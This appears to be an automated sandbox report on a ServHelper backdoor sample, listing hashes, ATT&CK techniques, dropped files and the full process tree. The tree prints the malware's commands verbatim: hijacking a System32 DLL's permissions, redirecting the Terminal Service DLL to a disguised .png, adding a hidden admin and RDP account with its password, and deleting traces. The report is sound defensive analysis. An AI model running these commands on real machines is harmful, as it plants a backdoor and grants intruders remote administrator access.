servhelper | 4bd7686dfdc21d3763deecc2bb8a238eb1848fe8328411aabded29d08a529398

Analysis

max time kernel
142s
max time network
160s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
03-05-2022 19:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4bd7686dfdc21d3763deecc2bb8a238eb1848fe8328411aabded29d08a529398.exe
Size

3.2MB
MD5

337e4fd5e423ee5e716ed7ee270bcd00
SHA1

6390cf1f9b5a7e5dc3494d603c634e8b5c9b6233
SHA256

4bd7686dfdc21d3763deecc2bb8a238eb1848fe8328411aabded29d08a529398
SHA512

e44814ffdfda11c7f2461b3ec8fa587bf2ca28b8f48b28a9bf103d5a3faf3e5293995c88e8e625eb71f856b5e5160f52ef011a5decd3acd4b1029aa63591e724

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

icacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

2444 icacls.exe
964 takeown.exe
2952 icacls.exe
3576 icacls.exe
4984 icacls.exe
4160 icacls.exe
4332 icacls.exe
4248 icacls.exe
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

pid	process
2444	icacls.exe
964	takeown.exe
2952	icacls.exe
3576	icacls.exe
4984	icacls.exe
4160	icacls.exe
4332	icacls.exe
4248	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Windows\Branding\mediasrv.png	upx
C:\Windows\Branding\mediasvc.png	upx

Loads dropped DLL 2 IoCs

Processes:

pid process

2148
2148
Modifies file permissions 1 TTPs 8 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exe

pid process

3576 icacls.exe
4984 icacls.exe
4160 icacls.exe
4332 icacls.exe
4248 icacls.exe
2444 icacls.exe
964 takeown.exe
2952 icacls.exe
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe

pid	process
2148
2148

pid	process
3576	icacls.exe
4984	icacls.exe
4160	icacls.exe
4332	icacls.exe
4248	icacls.exe
2444	icacls.exe
964	takeown.exe
2952	icacls.exe

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Windows directory 8 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\shellbrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

4440 reg.exe
Runs net.exe

pid	process
4440	reg.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid	process
3916	powershell.exe
3916	powershell.exe
4200	powershell.exe
4200	powershell.exe
5032	powershell.exe
5032	powershell.exe
4752	powershell.exe
4752	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

668
668

pid	process
668
668

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeicacls.exe

description	pid	process
Token: SeDebugPrivilege	3916	powershell.exe
Token: SeDebugPrivilege	4200	powershell.exe
Token: SeDebugPrivilege	5032	powershell.exe
Token: SeDebugPrivilege	4752	powershell.exe
Token: SeRestorePrivilege	3576	icacls.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

4bd7686dfdc21d3763deecc2bb8a238eb1848fe8328411aabded29d08a529398.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.exe

description	pid	process	target process
PID 1632 wrote to memory of 3916	1632	4bd7686dfdc21d3763deecc2bb8a238eb1848fe8328411aabded29d08a529398.exe	powershell.exe
PID 1632 wrote to memory of 3916	1632	4bd7686dfdc21d3763deecc2bb8a238eb1848fe8328411aabded29d08a529398.exe	powershell.exe
PID 3916 wrote to memory of 3796	3916	powershell.exe	csc.exe
PID 3916 wrote to memory of 3796	3916	powershell.exe	csc.exe
PID 3796 wrote to memory of 1500	3796	csc.exe	cvtres.exe
PID 3796 wrote to memory of 1500	3796	csc.exe	cvtres.exe
PID 3916 wrote to memory of 4200	3916	powershell.exe	powershell.exe
PID 3916 wrote to memory of 4200	3916	powershell.exe	powershell.exe
PID 3916 wrote to memory of 5032	3916	powershell.exe	powershell.exe
PID 3916 wrote to memory of 5032	3916	powershell.exe	powershell.exe
PID 3916 wrote to memory of 4752	3916	powershell.exe	powershell.exe
PID 3916 wrote to memory of 4752	3916	powershell.exe	powershell.exe
PID 3916 wrote to memory of 964	3916	powershell.exe	takeown.exe
PID 3916 wrote to memory of 964	3916	powershell.exe	takeown.exe
PID 3916 wrote to memory of 2952	3916	powershell.exe	icacls.exe
PID 3916 wrote to memory of 2952	3916	powershell.exe	icacls.exe
PID 3916 wrote to memory of 3576	3916	powershell.exe	icacls.exe
PID 3916 wrote to memory of 3576	3916	powershell.exe	icacls.exe
PID 3916 wrote to memory of 4984	3916	powershell.exe	icacls.exe
PID 3916 wrote to memory of 4984	3916	powershell.exe	icacls.exe
PID 3916 wrote to memory of 4160	3916	powershell.exe	icacls.exe
PID 3916 wrote to memory of 4160	3916	powershell.exe	icacls.exe
PID 3916 wrote to memory of 4332	3916	powershell.exe	icacls.exe
PID 3916 wrote to memory of 4332	3916	powershell.exe	icacls.exe
PID 3916 wrote to memory of 4248	3916	powershell.exe	icacls.exe
PID 3916 wrote to memory of 4248	3916	powershell.exe	icacls.exe
PID 3916 wrote to memory of 2444	3916	powershell.exe	icacls.exe
PID 3916 wrote to memory of 2444	3916	powershell.exe	icacls.exe
PID 3916 wrote to memory of 2868	3916	powershell.exe	reg.exe
PID 3916 wrote to memory of 2868	3916	powershell.exe	reg.exe
PID 3916 wrote to memory of 4440	3916	powershell.exe	reg.exe
PID 3916 wrote to memory of 4440	3916	powershell.exe	reg.exe
PID 3916 wrote to memory of 2392	3916	powershell.exe	reg.exe
PID 3916 wrote to memory of 2392	3916	powershell.exe	reg.exe
PID 3916 wrote to memory of 3664	3916	powershell.exe	net.exe
PID 3916 wrote to memory of 3664	3916	powershell.exe	net.exe
PID 3664 wrote to memory of 4816	3664	net.exe	net1.exe
PID 3664 wrote to memory of 4816	3664	net.exe	net1.exe
PID 3916 wrote to memory of 4972	3916	powershell.exe	cmd.exe
PID 3916 wrote to memory of 4972	3916	powershell.exe	cmd.exe
PID 4972 wrote to memory of 2600	4972	cmd.exe	cmd.exe
PID 4972 wrote to memory of 2600	4972	cmd.exe	cmd.exe
PID 2600 wrote to memory of 5064	2600	cmd.exe	net.exe
PID 2600 wrote to memory of 5064	2600	cmd.exe	net.exe
PID 5064 wrote to memory of 1608	5064	net.exe	net1.exe
PID 5064 wrote to memory of 1608	5064	net.exe	net1.exe
PID 3916 wrote to memory of 1848	3916	powershell.exe	cmd.exe
PID 3916 wrote to memory of 1848	3916	powershell.exe	cmd.exe
PID 1848 wrote to memory of 4580	1848	cmd.exe	cmd.exe
PID 1848 wrote to memory of 4580	1848	cmd.exe	cmd.exe
PID 4580 wrote to memory of 1016	4580	cmd.exe	net.exe
PID 4580 wrote to memory of 1016	4580	cmd.exe	net.exe
PID 1016 wrote to memory of 5056	1016	net.exe	net1.exe
PID 1016 wrote to memory of 5056	1016	net.exe	net1.exe
PID 3708 wrote to memory of 3928	3708	cmd.exe	net.exe
PID 3708 wrote to memory of 3928	3708	cmd.exe	net.exe
PID 3928 wrote to memory of 2488	3928	net.exe	net1.exe
PID 3928 wrote to memory of 2488	3928	net.exe	net1.exe
PID 4936 wrote to memory of 2844	4936	cmd.exe	net.exe
PID 4936 wrote to memory of 2844	4936	cmd.exe	net.exe
PID 2844 wrote to memory of 1712	2844	net.exe	net1.exe
PID 2844 wrote to memory of 1712	2844	net.exe	net1.exe
PID 3916 wrote to memory of 1616	3916	powershell.exe	cmd.exe
PID 3916 wrote to memory of 1616	3916	powershell.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\4bd7686dfdc21d3763deecc2bb8a238eb1848fe8328411aabded29d08a529398.exe
"C:\Users\Admin\AppData\Local\Temp\4bd7686dfdc21d3763deecc2bb8a238eb1848fe8328411aabded29d08a529398.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1632

\??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
-ep bypass -noexit -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3916

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lvlowopo\lvlowopo.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:3796

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB693.tmp" "c:\Users\Admin\AppData\Local\Temp\lvlowopo\CSC23AAE9E7F60A486E9411445B2152B32A.TMP"
4⤵
PID:1500

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4200

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4752

C:\Windows\system32\takeown.exe
"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:964

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2952

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3576

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4984

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4160

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4332

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4248

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2444

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
3⤵
PID:2868

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
3⤵
- Modifies registry key
PID:4440

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
3⤵
PID:2392

C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
3⤵
- Suspicious use of WriteProcessMemory
PID:3664

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
4⤵
PID:4816

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
3⤵
- Suspicious use of WriteProcessMemory
PID:4972

C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
4⤵
- Suspicious use of WriteProcessMemory
PID:2600

C:\Windows\system32\net.exe
net start rdpdr
5⤵
- Suspicious use of WriteProcessMemory
PID:5064

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
6⤵
PID:1608

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
3⤵
- Suspicious use of WriteProcessMemory
PID:1848

C:\Windows\system32\cmd.exe
cmd /c net start TermService
4⤵
- Suspicious use of WriteProcessMemory
PID:4580

C:\Windows\system32\net.exe
net start TermService
5⤵
- Suspicious use of WriteProcessMemory
PID:1016

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
6⤵
PID:5056

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
3⤵
PID:1616

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
3⤵
PID:2824

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:3708

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 000000 /del
2⤵
- Suspicious use of WriteProcessMemory
PID:3928

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
3⤵
PID:2488

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc pd21abwo /add
1⤵
- Suspicious use of WriteProcessMemory
PID:4936

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc pd21abwo /add
2⤵
- Suspicious use of WriteProcessMemory
PID:2844

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc pd21abwo /add
3⤵
PID:1712

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
PID:3952

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
2⤵
PID:4952

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
3⤵
PID:3316

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" TLWHJTYB$ /ADD
1⤵
PID:5060

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" TLWHJTYB$ /ADD
2⤵
PID:204

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" TLWHJTYB$ /ADD
3⤵
PID:872

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:3040

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
2⤵
PID:3248

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
3⤵
PID:1384

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc pd21abwo
1⤵
PID:3264

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc pd21abwo
2⤵
PID:4008

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc pd21abwo
3⤵
PID:2516

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

File Permissions Modification

T1222

Credential Access

Discovery

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
54KB

MD5
5f612d9087b8bcadb4002e6b026990e8

SHA1
b5f343e569abb0849c06e3d77d00cc1bd2d5f589

SHA256
838be164025509d2c4dd005aabf7bbca522b703e931d9c21fb287b5f06178450

SHA512
d5e3e0eeb9b4d3f7ceeba19bc83669258d77d6f973e90049d8cb2796e3f0f6502209e1863ba0a0c7d69b1cc3c0a43e74b9efd0557854ac349f3ffc51d6ea1c59

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB693.tmp
Filesize
1KB

MD5
c439285bbde55b677c096447745ccd29

SHA1
ffec0b5e55ed349b6b9938a8e4a04767d50c3ff1

SHA256
c674812c663d4cdf0e8e0d18dc54f291079d206332a96a857512ccaa71330061

SHA512
be41a39cf6507d4684f0243262ba98893b8eadde92363fadb82cd3a63a04ef443c0e4e0c4caf7f55ab9560d7dfc672d8172f79fdbe17a686d82ba85cf77c2f87

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-points.ps1
Filesize
3.0MB

MD5
031d92d079edd02c5f34248e9bf03ff6

SHA1
736e40d6cde2566fb5d976cb1d7172e6acb8bd12

SHA256
ab89298954e80cea1c73937cb628874832ab9d45c6d3be9dde40c4a4aae82ad2

SHA512
5bf6934556f451d35303e50e03b5a74a4b74d58b836f15c3cc3356b0b9e1a2bff6867153c63537f5fc942d346850bc9d2a34cf509d6c5b4d13d9021eefce39f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\lvlowopo\lvlowopo.dll
Filesize
3KB

MD5
cb9e39baafea02d62d0c9252a81e8e7c

SHA1
ce60b8f72ed39b8b78af22be04cbbe7ff5b85d77

SHA256
251c5247ede2f35abe3c3ff497a0a2dd8a4081371ceefa28120556722e9009b2

SHA512
5c9eba6ae4c8a559fe72a48329d49fa057926f28be5737cab07b2a0524c035975d518cc294d14809ddc9ef3f3484f4233f9388b63ea127edd82e9ef48c986db3

Download Submit
C:\Windows\Branding\mediasrv.png
Filesize
54KB

MD5
40bf8ddb2544e110ff0f368fdb0f34ba

SHA1
a9a0ed994500563a1b45b7748d76ab522d9f870f

SHA256
21bebaf9f55e1288bea72cf10645536d3b62599973cb48adb3f4d3c9e0d450a7

SHA512
8e3583b868d3a9ac1f992dfa555fe2ab60934ff76e35c751b8e8ca13d94ded40e02f47ff9074c19fea48bf68a02e21fef87c0b75a385aae53d41184b475e7ac5

Download Submit
C:\Windows\Branding\mediasvc.png
Filesize
944KB

MD5
dc99adf951d836bbac2b6e729555c3b7

SHA1
f3c6f96a3ae48e4048771bc070f427c0d7353d60

SHA256
0157d803e2b1b8a43236d08aa8f8f80d3afd629d822bb901fb712192e7aa90be

SHA512
3eff38448e3a5b9328643e1f96873c126b470ec4d576f5504f8c1abe1bf6800b662cd97d12979cdffdca13e9410a01a5390a2dd0f27b9c9a0c083d953690955f

Download Submit
C:\Windows\system32\rfxvmt.dll
Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\lsarpc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\lsarpc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lvlowopo\CSC23AAE9E7F60A486E9411445B2152B32A.TMP
Filesize
652B

MD5
bf64c714dc1375e66b9e64e2b54cd4c5

SHA1
579f954358037eb68c91dcaafcf2ef394d11d04d

SHA256
d8ae1460c1acea4ba0ad40432d81119004e7e2ad4d7d035e696d6a41a522fb23

SHA512
abecf88ab8fdd7bfc115b277260d554a011594bb62078d919501118b48f7ee5b5ce8a48963f4aebe00db84a0f1488176594d502010ce94cdcd9d10c9dbe86a77

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lvlowopo\lvlowopo.0.cs
Filesize
504B

MD5
8e55cb0ca998472ab6d3e295e0c4dd50

SHA1
407d07a29b89fc3afc246c0680d5857e3f51019d

SHA256
63e03eacae29a0d2187103f57a01a5e92ecb3b83a0452e05926303ab57a86685

SHA512
c51982ecdad9a366544cfb68a52808f6a54ed45c1e5b384c0ac5354fe713c18a16c90ee57e0d018caad02f7f293677c62f4c8a9a51bdea143f3afe593172bd28

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lvlowopo\lvlowopo.cmdline
Filesize
369B

MD5
12524ccc3bc37bbe35e7b5963d148cfa

SHA1
6a7b17fd989b22ad6b88607f03ed0b8e86e77439

SHA256
59b6b333ee73158564f2df7b5b493623930ef1f2affd9e50afcb60d9db6ab722

SHA512
8357b5f82c51d908986db8b1a5e2b6e0c782c2ec3848856183d706336ba0e2e8fc7458410febc195de464a32d76d4042132ae8706a59aa69abed8d65ba82944f

Download Submit
memory/204-185-0x0000000000000000-mapping.dmp

Download
memory/872-186-0x0000000000000000-mapping.dmp

Download
memory/964-151-0x0000000000000000-mapping.dmp

Download
memory/1016-171-0x0000000000000000-mapping.dmp

Download
memory/1384-188-0x0000000000000000-mapping.dmp

Download
memory/1500-138-0x0000000000000000-mapping.dmp

Download
memory/1608-168-0x0000000000000000-mapping.dmp

Download
memory/1616-179-0x0000000000000000-mapping.dmp

Download
memory/1712-178-0x0000000000000000-mapping.dmp

Download
memory/1848-169-0x0000000000000000-mapping.dmp

Download
memory/2392-162-0x0000000000000000-mapping.dmp

Download
memory/2444-159-0x0000000000000000-mapping.dmp

Download
memory/2488-176-0x0000000000000000-mapping.dmp

Download
memory/2516-191-0x0000000000000000-mapping.dmp

Download
memory/2600-166-0x0000000000000000-mapping.dmp

Download
memory/2824-180-0x0000000000000000-mapping.dmp

Download
memory/2844-177-0x0000000000000000-mapping.dmp

Download
memory/2868-160-0x0000000000000000-mapping.dmp

Download
memory/2952-153-0x0000000000000000-mapping.dmp

Download
memory/3248-187-0x0000000000000000-mapping.dmp

Download
memory/3316-182-0x0000000000000000-mapping.dmp

Download
memory/3576-154-0x0000000000000000-mapping.dmp

Download
memory/3664-163-0x0000000000000000-mapping.dmp

Download
memory/3796-135-0x0000000000000000-mapping.dmp

Download
memory/3916-134-0x00007FFAB72A0000-0x00007FFAB7D61000-memory.dmp

Filesize
10.8MB

Download
memory/3916-132-0x000002BE55880000-0x000002BE558C4000-memory.dmp

Filesize
272KB

Download
memory/3916-130-0x0000000000000000-mapping.dmp

Download
memory/3916-142-0x000002BE5DEB0000-0x000002BE5E026000-memory.dmp

Filesize
1.5MB

Download
memory/3916-184-0x000002BE55CE0000-0x000002BE55D56000-memory.dmp

Filesize
472KB

Download
memory/3916-143-0x000002BE5E240000-0x000002BE5E44A000-memory.dmp

Filesize
2.0MB

Download
memory/3916-131-0x000002BE54390000-0x000002BE543B2000-memory.dmp

Filesize
136KB

Download
memory/3928-175-0x0000000000000000-mapping.dmp

Download
memory/4008-190-0x0000000000000000-mapping.dmp

Download
memory/4160-156-0x0000000000000000-mapping.dmp

Download
memory/4200-145-0x00007FFAB72A0000-0x00007FFAB7D61000-memory.dmp

Filesize
10.8MB

Download
memory/4200-144-0x0000000000000000-mapping.dmp

Download
memory/4248-158-0x0000000000000000-mapping.dmp

Download
memory/4332-157-0x0000000000000000-mapping.dmp

Download
memory/4440-161-0x0000000000000000-mapping.dmp

Download
memory/4580-170-0x0000000000000000-mapping.dmp

Download
memory/4752-149-0x00007FFAB72A0000-0x00007FFAB7D61000-memory.dmp

Filesize
10.8MB

Download
memory/4752-147-0x0000000000000000-mapping.dmp

Download
memory/4816-164-0x0000000000000000-mapping.dmp

Download
memory/4952-181-0x0000000000000000-mapping.dmp

Download
memory/4972-165-0x0000000000000000-mapping.dmp

Download
memory/4984-155-0x0000000000000000-mapping.dmp

Download
memory/5032-148-0x00007FFAB72A0000-0x00007FFAB7D61000-memory.dmp

Filesize
10.8MB

Download
memory/5032-146-0x0000000000000000-mapping.dmp

Download
memory/5056-172-0x0000000000000000-mapping.dmp

Download
memory/5064-167-0x0000000000000000-mapping.dmp

Download